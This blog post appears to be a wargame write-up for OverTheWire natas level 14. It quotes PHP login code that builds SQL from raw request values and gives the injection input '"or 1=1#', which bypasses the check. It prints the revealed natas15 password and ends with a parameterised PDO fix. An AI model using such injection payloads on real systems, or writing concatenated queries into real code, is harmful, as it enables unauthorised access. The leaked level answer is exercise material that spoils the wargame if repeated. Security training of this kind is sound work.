Overthewire-natas14

Overthewire level 14 to level 15

This level asks us to enter a username and password to obtain the password for level 15. The page's source code is as follows:

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
}

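Because the code concatenates username and password directly into the query string, we can consider using SQL injection to bypass the login mechanism.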

username = "or 1=1#
password =

This is a very simple SQL injection. After concatenation, the query becomes

select * from users where username="" or 1=1#

The "#" comments out the code after it, so the password no longer matters.
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
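
The same login check written with bound parameters, as an added example that is not part of the original post or the natas14 source. It assumes PDO with the pdo_sqlite driver, an in-memory database standing in for the level's MySQL server, and a constructed users row; the function name `login` is hypothetical.

```php
<?php
// Added example, not the natas14 source.
// Assumptions: PDO + pdo_sqlite are available; the in-memory database and the
// 'alice' row are constructed for the demo; login() is a hypothetical name.

function login(PDO $db, string $username, string $password): bool
{
    // The SQL text is fixed. User input is sent as bound values, so quotes
    // and '#' inside it are compared as data and never parsed as SQL.
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM users WHERE username = ? AND password = ?'
    );
    $stmt->execute([$username, $password]);
    return (int) $stmt->fetchColumn() > 0;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Against MySQL, also disable emulated prepares so binding happens server-side:
// $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES ('alice', 'constructed-password')");

$attempts = [
    ['alice', 'constructed-password'], // valid credentials
    ['alice', 'wrong'],                // wrong password
    ['"or 1=1#', ''],                  // the input used in this post
];

foreach ($attempts as [$u, $p]) {
    printf(
        "%-10s => %s\n",
        $u,
        login($db, $u, $p) ? 'Successful login!' : 'Access denied!'
    );
}
```

The debug branch in the level's source, which echoes the full query to the client, should also be dropped in a hardened version.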

posted @ 2021-05-26 08:55  wudiiv11